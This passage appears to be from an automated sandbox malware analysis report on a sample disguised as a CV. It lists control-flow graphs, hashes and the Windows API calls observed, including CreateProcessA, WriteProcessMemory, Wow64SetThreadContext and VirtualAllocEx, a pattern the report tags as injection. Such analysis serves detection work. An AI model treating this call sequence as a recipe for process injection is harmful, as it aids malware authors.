                                                                                                  control_flow_graph 108 78890e4-7889185 110 78891be-78891de 108->110 111 7889187-7889191 108->111 116 78891e0-78891ea 110->116 117 7889217-7889246 110->117 111->110 112 7889193-7889195 111->112 114 78891b8-78891bb 112->114 115 7889197-78891a1 112->115 114->110 118 78891a3 115->118 119 78891a5-78891b4 115->119 116->117 121 78891ec-78891ee 116->121 127 7889248-7889252 117->127 128 788927f-7889339 CreateProcessA 117->128 118->119 119->119 120 78891b6 119->120 120->114 122 78891f0-78891fa 121->122 123 7889211-7889214 121->123 125 78891fc 122->125 126 78891fe-788920d 122->126 123->117 125->126 126->126 130 788920f 126->130 127->128 129 7889254-7889256 127->129 139 788933b-7889341 128->139 140 7889342-78893c8 128->140 131 7889258-7889262 129->131 132 7889279-788927c 129->132 130->123 134 7889264 131->134 135 7889266-7889275 131->135 132->128 134->135 135->135 136 7889277 135->136 136->132 139->140 150 78893d8-78893dc 140->150 151 78893ca-78893ce 140->151 153 78893ec-78893f0 150->153 154 78893de-78893e2 150->154 151->150 152 78893d0 151->152 152->150 156 7889400-7889404 153->156 157 78893f2-78893f6 153->157 154->153 155 78893e4 154->155 155->153 158 7889416-788941d 156->158 159 7889406-788940c 156->159 157->156 160 78893f8 157->160 161 788941f-788942e 158->161 162 7889434 158->162 159->158 160->156 161->162 164 7889435 162->164 164->164
                                                                                                  APIs
                                                                                                  • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 07889326
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.28281743634.0000000007880000.00000040.00000800.00020000.00000000.sdmp, Offset: 07880000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_7880000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: CreateProcess
                                                                                                  • String ID:
                                                                                                  • API String ID: 963392458-0
                                                                                                  • Opcode ID: 9afa447554d684508bc54894c89a41742e1f88a432fd05c97cd325a39a540687
                                                                                                  • Instruction ID: e7693cbb4809dda3cf0d7555826c840706f66e6c50306038384f1c53986e46bf
                                                                                                  • Opcode Fuzzy Hash: 9afa447554d684508bc54894c89a41742e1f88a432fd05c97cd325a39a540687
                                                                                                  • Instruction Fuzzy Hash: B8A16BB1D0021ACFEB54DF68C8817EDBBB6BF58314F1481A9E819E7280D774A985CF91
                                                                                                  Function 078890F0 Relevance: 1.7, APIs: 1, Instructions: 243processCOMMON
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 165 78890f0-7889185 167 78891be-78891de 165->167 168 7889187-7889191 165->168 173 78891e0-78891ea 167->173 174 7889217-7889246 167->174 168->167 169 7889193-7889195 168->169 171 78891b8-78891bb 169->171 172 7889197-78891a1 169->172 171->167 175 78891a3 172->175 176 78891a5-78891b4 172->176 173->174 178 78891ec-78891ee 173->178 184 7889248-7889252 174->184 185 788927f-7889339 CreateProcessA 174->185 175->176 176->176 177 78891b6 176->177 177->171 179 78891f0-78891fa 178->179 180 7889211-7889214 178->180 182 78891fc 179->182 183 78891fe-788920d 179->183 180->174 182->183 183->183 187 788920f 183->187 184->185 186 7889254-7889256 184->186 196 788933b-7889341 185->196 197 7889342-78893c8 185->197 188 7889258-7889262 186->188 189 7889279-788927c 186->189 187->180 191 7889264 188->191 192 7889266-7889275 188->192 189->185 191->192 192->192 193 7889277 192->193 193->189 196->197 207 78893d8-78893dc 197->207 208 78893ca-78893ce 197->208 210 78893ec-78893f0 207->210 211 78893de-78893e2 207->211 208->207 209 78893d0 208->209 209->207 213 7889400-7889404 210->213 214 78893f2-78893f6 210->214 211->210 212 78893e4 211->212 212->210 215 7889416-788941d 213->215 216 7889406-788940c 213->216 214->213 217 78893f8 214->217 218 788941f-788942e 215->218 219 7889434 215->219 216->215 217->213 218->219 221 7889435 219->221 221->221
                                                                                                  APIs
                                                                                                  • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 07889326
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.28281743634.0000000007880000.00000040.00000800.00020000.00000000.sdmp, Offset: 07880000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_7880000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: CreateProcess
                                                                                                  • String ID:
                                                                                                  • API String ID: 963392458-0
                                                                                                  • Opcode ID: 002174351ca3a81770c599f6b1ee1b96705ff72b069ffeb8323ab334fe6f81fc
                                                                                                  • Instruction ID: 3cd48b7a68340ce8bd25047e08e5f2604fb16ceae2d09e1032de5d6206629dee
                                                                                                  • Opcode Fuzzy Hash: 002174351ca3a81770c599f6b1ee1b96705ff72b069ffeb8323ab334fe6f81fc
                                                                                                  • Instruction Fuzzy Hash: D6916AB1D0021ACFEB54DF68C8807EDBAB6BF58314F1481A9E809E7280D774A985CF91
                                                                                                  Function 019BB4B8 Relevance: 1.7, APIs: 1, Instructions: 195COMMON
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 222 19bb4b8-19bb4d7 223 19bb4d9-19bb4e6 call 19bb158 222->223 224 19bb503-19bb507 222->224 231 19bb4e8 223->231 232 19bb4fc 223->232 226 19bb51b-19bb55c 224->226 227 19bb509-19bb513 224->227 233 19bb569-19bb577 226->233 234 19bb55e-19bb566 226->234 227->226 279 19bb4ee call 19bb751 231->279 280 19bb4ee call 19bb760 231->280 232->224 235 19bb59b-19bb59d 233->235 236 19bb579-19bb57e 233->236 234->233 241 19bb5a0-19bb5a7 235->241 238 19bb589 236->238 239 19bb580-19bb587 call 19bb164 236->239 237 19bb4f4-19bb4f6 237->232 240 19bb638-19bb6f8 237->240 245 19bb58b-19bb599 238->245 239->245 272 19bb6fa-19bb6fd 240->272 273 19bb700-19bb72b GetModuleHandleW 240->273 242 19bb5a9-19bb5b1 241->242 243 19bb5b4-19bb5bb 241->243 242->243 246 19bb5c8-19bb5d1 call 19bb174 243->246 247 19bb5bd-19bb5c5 243->247 245->241 253 19bb5de-19bb5e3 246->253 254 19bb5d3-19bb5db 246->254 247->246 255 19bb601-19bb605 253->255 256 19bb5e5-19bb5ec 253->256 254->253 277 19bb608 call 19bba50 255->277 278 19bb608 call 19bba60 255->278 256->255 258 19bb5ee-19bb5fe call 19bb184 call 19bb194 256->258 258->255 259 19bb60b-19bb60e 262 19bb631-19bb637 259->262 263 19bb610-19bb62e 259->263 263->262 272->273 274 19bb72d-19bb733 273->274 275 19bb734-19bb748 273->275 274->275 277->259 278->259 279->237 280->237
                                                                                                  APIs
                                                                                                  • GetModuleHandleW.KERNELBASE(00000000), ref: 019BB71E
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.28276671877.00000000019B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 019B0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_19b0000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: HandleModule
                                                                                                  • String ID:
                                                                                                  • API String ID: 4139908857-0
                                                                                                  • Opcode ID: 42c76b58fb6ebea6af6d8b6feef0dc6dfe377d2747ba97e5abeaa5de158faa61
                                                                                                  • Instruction ID: 7f7c17ca18c49971e18eb91bae6cb1eb70daa25532705740a84045f286356f7c
                                                                                                  • Opcode Fuzzy Hash: 42c76b58fb6ebea6af6d8b6feef0dc6dfe377d2747ba97e5abeaa5de158faa61
                                                                                                  • Instruction Fuzzy Hash: 87817870A00B458FE724CF2AD59479ABBF5FF88301F04892ED48AD7A90DB74E845CB95
                                                                                                  Function 07887828 Relevance: 1.6, APIs: 1, Instructions: 108windowCOMMON
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 281 7887828 282 7887829-7887859 281->282 284 78877e8-7887808 282->284 285 788785b-78878a0 282->285 285->282 289 78878a2-788b3da PostMessageW 285->289 291 788b3dc-788b3e2 289->291 292 788b3e3-788b3f7 289->292 291->292
                                                                                                  APIs
                                                                                                  • PostMessageW.USER32(?,00000010,00000000,?), ref: 0788B3CD
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.28281743634.0000000007880000.00000040.00000800.00020000.00000000.sdmp, Offset: 07880000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_7880000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: MessagePost
                                                                                                  • String ID:
                                                                                                  • API String ID: 410705778-0
                                                                                                  • Opcode ID: e725a599552badcf83c2d3b6234f8a4bbe06586bc7b71cc02c72226826c61fe8
                                                                                                  • Instruction ID: dc6d8973aad50658295d9e5d4fda8bff5a75ae28c9302ea7be36ef3a4acd88ab
                                                                                                  • Opcode Fuzzy Hash: e725a599552badcf83c2d3b6234f8a4bbe06586bc7b71cc02c72226826c61fe8
                                                                                                  • Instruction Fuzzy Hash: FE41F5B2C083898FD702DF68D4987DA7FF4EF56204F0544AED0889B252D3786505CBA5
                                                                                                  Function 019B44D4 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 294 19b44d4-19b59d9 CreateActCtxA 297 19b59db-19b59e1 294->297 298 19b59e2-19b5a3c 294->298 297->298 305 19b5a4b-19b5a4f 298->305 306 19b5a3e-19b5a41 298->306 307 19b5a51-19b5a5d 305->307 308 19b5a60 305->308 306->305 307->308 309 19b5a61 308->309 309->309
                                                                                                  APIs
                                                                                                  • CreateActCtxA.KERNEL32(?), ref: 019B59C9
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.28276671877.00000000019B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 019B0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_19b0000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Create
                                                                                                  • String ID:
                                                                                                  • API String ID: 2289755597-0
                                                                                                  • Opcode ID: 7a6085c0b1a57794366ffa515bc9620390aacb3444cd01b4a818a2e3ae9f372e
                                                                                                  • Instruction ID: a4d5ab85148626fe727c6894902a91c0393b4361e5e7d77e0a1b78b189069ee2
                                                                                                  • Opcode Fuzzy Hash: 7a6085c0b1a57794366ffa515bc9620390aacb3444cd01b4a818a2e3ae9f372e
                                                                                                  • Instruction Fuzzy Hash: 3741CFB0C00718CBEB24DFAAC884BDDBBF5BF49314F60805AD508AB251DB756945CF90
                                                                                                  Function 019B590C Relevance: 1.6, APIs: 1, Instructions: 94COMMON
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 311 19b590c-19b59d9 CreateActCtxA 313 19b59db-19b59e1 311->313 314 19b59e2-19b5a3c 311->314 313->314 321 19b5a4b-19b5a4f 314->321 322 19b5a3e-19b5a41 314->322 323 19b5a51-19b5a5d 321->323 324 19b5a60 321->324 322->321 323->324 325 19b5a61 324->325 325->325
                                                                                                  APIs
                                                                                                  • CreateActCtxA.KERNEL32(?), ref: 019B59C9
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.28276671877.00000000019B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 019B0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_19b0000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Create
                                                                                                  • String ID:
                                                                                                  • API String ID: 2289755597-0
                                                                                                  • Opcode ID: b17a58625315fc75e07e6bd8cf6e70d403e30650fd4938582d33841dd10ffacc
                                                                                                  • Instruction ID: 8c6f9f85e53206bd90a3adaacd0b0ecabb4e3acf7318c51d5bd298922d78c83b
                                                                                                  • Opcode Fuzzy Hash: b17a58625315fc75e07e6bd8cf6e70d403e30650fd4938582d33841dd10ffacc
                                                                                                  • Instruction Fuzzy Hash: 3641AEB0C00759CFEB24CFAAC9847DDBBB5BF49304F60845AD408AB255DB756945CF90
                                                                                                  Function 05F26AF8 Relevance: 1.6, APIs: 1, Instructions: 91windowCOMMON
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 327 5f26af8-5f26b2d call 5f23454 330 5f26b42-5f26b50 327->330 331 5f26b2f-5f26b3f 327->331 334 5f26b52-5f26b8c 330->334 335 5f26b8f-5f26bd4 CreateIconFromResourceEx 330->335 334->335 336 5f26bd6-5f26bdc 335->336 337 5f26bdd-5f26bfa 335->337 336->337
                                                                                                  APIs
                                                                                                  • CreateIconFromResourceEx.USER32(?,?,?,?,?,?,?), ref: 05F26BC7
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.28281306470.0000000005F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F20000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_5f20000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: CreateFromIconResource
                                                                                                  • String ID:
                                                                                                  • API String ID: 3668623891-0
                                                                                                  • Opcode ID: 44a4b21c46ff93098ec4efadb7979acb22267768e6cce01324e5ce540f8f090e
                                                                                                  • Instruction ID: e6341bfd1c0caf08303da1d71ea7749269856aff31820cbc934fd5a6c0a33abc
                                                                                                  • Opcode Fuzzy Hash: 44a4b21c46ff93098ec4efadb7979acb22267768e6cce01324e5ce540f8f090e
                                                                                                  • Instruction Fuzzy Hash: 5B31BCB69043989FDB02CFA5C844AEEBFF4EF09310F14849AE554EB261C3399914CBA0
                                                                                                  Function 078878D0 Relevance: 1.6, APIs: 1, Instructions: 84windowCOMMON
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 340 78878d0-7887900 342 788788b-78878a0 340->342 343 7887902-7887903 340->343 344 7887829-7887859 342->344 345 78878a2-78878c7 342->345 346 788b370-788b3da PostMessageW 343->346 350 78877e8-7887808 344->350 351 788785b-7887889 344->351 345->346 347 788b3dc-788b3e2 346->347 348 788b3e3-788b3f7 346->348 347->348 351->342
                                                                                                  APIs
                                                                                                  • PostMessageW.USER32(?,00000010,00000000,?), ref: 0788B3CD
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.28281743634.0000000007880000.00000040.00000800.00020000.00000000.sdmp, Offset: 07880000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_7880000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: MessagePost
                                                                                                  • String ID:
                                                                                                  • API String ID: 410705778-0
                                                                                                  • Opcode ID: d8e789e990b0a39c0ed17e189c5af8331bf5939598f671ddf6bb9a9002dd679f
                                                                                                  • Instruction ID: 9ec796cca376852d11d2e923b9ab47a02e2a76ba15de4b893494a189af9b4122
                                                                                                  • Opcode Fuzzy Hash: d8e789e990b0a39c0ed17e189c5af8331bf5939598f671ddf6bb9a9002dd679f
                                                                                                  • Instruction Fuzzy Hash: 7E31CFF1804389CFDB01DF99D4887DABFF8EF59314F14846AD089AB601D374A445CBA5
                                                                                                  Function 07888E68 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 366 7888e68-7888eb6 368 7888eb8-7888ec4 366->368 369 7888ec6-7888f05 WriteProcessMemory 366->369 368->369 371 7888f0e-7888f3e 369->371 372 7888f07-7888f0d 369->372 372->371
                                                                                                  APIs
                                                                                                  • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 07888EF8
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.28281743634.0000000007880000.00000040.00000800.00020000.00000000.sdmp, Offset: 07880000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_7880000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: MemoryProcessWrite
                                                                                                  • String ID:
                                                                                                  • API String ID: 3559483778-0
                                                                                                  • Opcode ID: 85549e314d6d712b11bdbb8a7dfab46d73bbcc743a612d3072e1b3b1c0a53766
                                                                                                  • Instruction ID: 712ac6c0b59cdf34b77b0f932b2171f531147b7e926744deadafba0cf115969b
                                                                                                  • Opcode Fuzzy Hash: 85549e314d6d712b11bdbb8a7dfab46d73bbcc743a612d3072e1b3b1c0a53766
                                                                                                  • Instruction Fuzzy Hash: A4213BB5900349DFDB10DFAAC8847DEBBF5FF48314F50882AE958A7240D7789944CB64
                                                                                                  Function 07888E60 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 355 7888e60-7888eb6 358 7888eb8-7888ec4 355->358 359 7888ec6-7888f05 WriteProcessMemory 355->359 358->359 361 7888f0e-7888f3e 359->361 362 7888f07-7888f0d 359->362 362->361
                                                                                                  APIs
                                                                                                  • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 07888EF8
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.28281743634.0000000007880000.00000040.00000800.00020000.00000000.sdmp, Offset: 07880000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_7880000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: MemoryProcessWrite
                                                                                                  • String ID:
                                                                                                  • API String ID: 3559483778-0
                                                                                                  • Opcode ID: d13943b552f2706f5b30fd5df9be4305dfc79e6ccfd62b91ff8ebd9b280200ad
                                                                                                  • Instruction ID: 9ada64c15cee0b461008751b0ae4859e90282302ae85e8b86b7b6acd222aeaa8
                                                                                                  • Opcode Fuzzy Hash: d13943b552f2706f5b30fd5df9be4305dfc79e6ccfd62b91ff8ebd9b280200ad
                                                                                                  • Instruction Fuzzy Hash: 792124B6900349DFDB10DFA9C884BDEBBB5FF88214F50882AE958A7241C7789954CB64
                                                                                                  Function 07888F50 Relevance: 1.6, APIs: 1, Instructions: 67COMMON
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 376 7888f50-7888fe5 ReadProcessMemory 380 7888fee-788901e 376->380 381 7888fe7-7888fed 376->381 381->380
                                                                                                  APIs
                                                                                                  • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 07888FD8
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.28281743634.0000000007880000.00000040.00000800.00020000.00000000.sdmp, Offset: 07880000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_7880000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: MemoryProcessRead
                                                                                                  • String ID:
                                                                                                  • API String ID: 1726664587-0
                                                                                                  • Opcode ID: d7957b67af20e607f8c2a436a967aa60e761906fd959f1392dd6c145361d93e8
                                                                                                  • Instruction ID: 8e0f01e75acef753fa05f669b317259232dac7c44511175ac6ea53a6c141a678
                                                                                                  • Opcode Fuzzy Hash: d7957b67af20e607f8c2a436a967aa60e761906fd959f1392dd6c145361d93e8
                                                                                                  • Instruction Fuzzy Hash: 4D212CB58003499FDB14DF9AD8847EEFBF5FF48310F50841AE558A7240C7789945CB65
                                                                                                  Function 019BD518 Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 385 19bd518-19bda3c DuplicateHandle 387 19bda3e-19bda44 385->387 388 19bda45-19bda62 385->388 387->388
                                                                                                  APIs
                                                                                                  • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,019BD96E,?,?,?,?,?), ref: 019BDA2F
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.28276671877.00000000019B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 019B0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_19b0000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: DuplicateHandle
                                                                                                  • String ID:
                                                                                                  • API String ID: 3793708945-0
                                                                                                  • Opcode ID: 0ecaacb576cda9bb48fea62aee62fa46b5e7f71f20bb846a83b30f710b3cc086
                                                                                                  • Instruction ID: c27c8b66a0048b7ee7748290134ba552e110030601ced2345cbc26f7ad40b392
                                                                                                  • Opcode Fuzzy Hash: 0ecaacb576cda9bb48fea62aee62fa46b5e7f71f20bb846a83b30f710b3cc086
                                                                                                  • Instruction Fuzzy Hash: D621E3B5900248AFDB10CF9AD984ADEBFF9EB48314F14841AE918A3310D374A944CFA5
                                                                                                  Function 019BD9A3 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 391 19bd9a3 392 19bd9a8-19bda3c DuplicateHandle 391->392 393 19bda3e-19bda44 392->393 394 19bda45-19bda62 392->394 393->394
                                                                                                  APIs
                                                                                                  • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,019BD96E,?,?,?,?,?), ref: 019BDA2F
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.28276671877.00000000019B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 019B0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_19b0000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: DuplicateHandle
                                                                                                  • String ID:
                                                                                                  • API String ID: 3793708945-0
                                                                                                  • Opcode ID: 3115d2d75ea49079aab8865b3f4d8f649ab7f81a2570895d55adab9d5b4d5ed6
                                                                                                  • Instruction ID: 5a1e6c27711789a639ad136788f61e7b471051994fcb90867342fd210098186d
                                                                                                  • Opcode Fuzzy Hash: 3115d2d75ea49079aab8865b3f4d8f649ab7f81a2570895d55adab9d5b4d5ed6
                                                                                                  • Instruction Fuzzy Hash: D721B3B5900248AFDB10CF9AD984ADEBFF9EB48314F14841AE958A7350D374A944CF65
                                                                                                  Function 07888F58 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 07888FD8
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.28281743634.0000000007880000.00000040.00000800.00020000.00000000.sdmp, Offset: 07880000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_7880000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: MemoryProcessRead
                                                                                                  • String ID:
                                                                                                  • API String ID: 1726664587-0
                                                                                                  • Opcode ID: b1a6056922a65eea2af685b2fd3f5bb98b64ddb78da0b823b1e03f685a0e0d67
                                                                                                  • Instruction ID: 81333cca363fa561e16dffd6f6feb7d6141eb81a5def579614fc9c11328f950a
                                                                                                  • Opcode Fuzzy Hash: b1a6056922a65eea2af685b2fd3f5bb98b64ddb78da0b823b1e03f685a0e0d67
                                                                                                  • Instruction Fuzzy Hash: 7C212AB18003499FDB10DF9AD884BDEFBF5FF48310F50882AE558A7240C7789945CB64
                                                                                                  Function 07888CC8 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 397 7888cc8-7888d1b 399 7888d2b-7888d5b Wow64SetThreadContext 397->399 400 7888d1d-7888d29 397->400 402 7888d5d-7888d63 399->402 403 7888d64-7888d94 399->403 400->399 402->403
                                                                                                  APIs
                                                                                                  • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 07888D4E
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.28281743634.0000000007880000.00000040.00000800.00020000.00000000.sdmp, Offset: 07880000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_7880000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ContextThreadWow64
                                                                                                  • String ID:
                                                                                                  • API String ID: 983334009-0
                                                                                                  • Opcode ID: 9cc61ec8f032777d61a37b98c9ba04dcdc614d79e08cc5ff1e605106f99796d5
                                                                                                  • Instruction ID: 0a098fdd20fdb3e3613316ea90a141ec2db5d16d0375f8fb13d6ea22378e9ed3
                                                                                                  • Opcode Fuzzy Hash: 9cc61ec8f032777d61a37b98c9ba04dcdc614d79e08cc5ff1e605106f99796d5
                                                                                                  • Instruction Fuzzy Hash: 56216AB19003498FEB14DFAAC4847EEBBF5EF58214F54842ED459A7240C778A944CFA4
                                                                                                  Function 07888CD0 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 07888D4E
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.28281743634.0000000007880000.00000040.00000800.00020000.00000000.sdmp, Offset: 07880000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_7880000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ContextThreadWow64
                                                                                                  • String ID:
                                                                                                  • API String ID: 983334009-0
                                                                                                  • Opcode ID: 6e8c10206b9391648c0d93f1aa61d9a3d44fcb83874a1004237c613262222e48
                                                                                                  • Instruction ID: 450050f676be2fd5680c106233b51b41022f22e6e2ad1d9ed9b3f382d5022d57
                                                                                                  • Opcode Fuzzy Hash: 6e8c10206b9391648c0d93f1aa61d9a3d44fcb83874a1004237c613262222e48
                                                                                                  • Instruction Fuzzy Hash: 1E2147B19003099FDB14DFAAC4847EEBBF4EF98214F54882AD459A7240C778A945CFA4
                                                                                                  Function 0788B400 Relevance: 1.6, APIs: 1, Instructions: 61windowCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • PostMessageW.USER32(?,00000010,00000000,?), ref: 0788B3CD
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.28281743634.0000000007880000.00000040.00000800.00020000.00000000.sdmp, Offset: 07880000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_7880000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: MessagePost
                                                                                                  • String ID:
                                                                                                  • API String ID: 410705778-0
                                                                                                  • Opcode ID: 3f020ee9bf9738dc136d6728a5430ace5aa738abdf5739760fcb674107ff41b0
                                                                                                  • Instruction ID: ce2195c85ec36f108eef3c5e41840090cf2eec85d79292d83acc6836cf9f2b93
                                                                                                  • Opcode Fuzzy Hash: 3f020ee9bf9738dc136d6728a5430ace5aa738abdf5739760fcb674107ff41b0
                                                                                                  • Instruction Fuzzy Hash: B811DFF69003598BDB20EFA4D5057EEBBF0AF98310F18851AC545B7351CB396904CBA4
                                                                                                  Function 019B891C Relevance: 1.6, APIs: 1, Instructions: 57COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • FindWindowW.USER32(00000000,00000000), ref: 019BA0AE
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.28276671877.00000000019B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 019B0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_19b0000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: FindWindow
                                                                                                  • String ID:
                                                                                                  • API String ID: 134000473-0
                                                                                                  • Opcode ID: bea33e495255df2975c4aa452c13bb93692346c446dc7881ebb2ae83387d9001
                                                                                                  • Instruction ID: 9f76d8de9ffa61046d666b04fea7310c332e4959dc520bebd0b619ad03a65f27
                                                                                                  • Opcode Fuzzy Hash: bea33e495255df2975c4aa452c13bb93692346c446dc7881ebb2ae83387d9001
                                                                                                  • Instruction Fuzzy Hash: B82110B58013099FDB14CF9AC884BDEFBF8FB89210F50852ED519B7200D375A948CBA5
                                                                                                  Function 07888DA1 Relevance: 1.6, APIs: 1, Instructions: 56memoryCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 07888E16
                                                                                                  Memory Dump Source
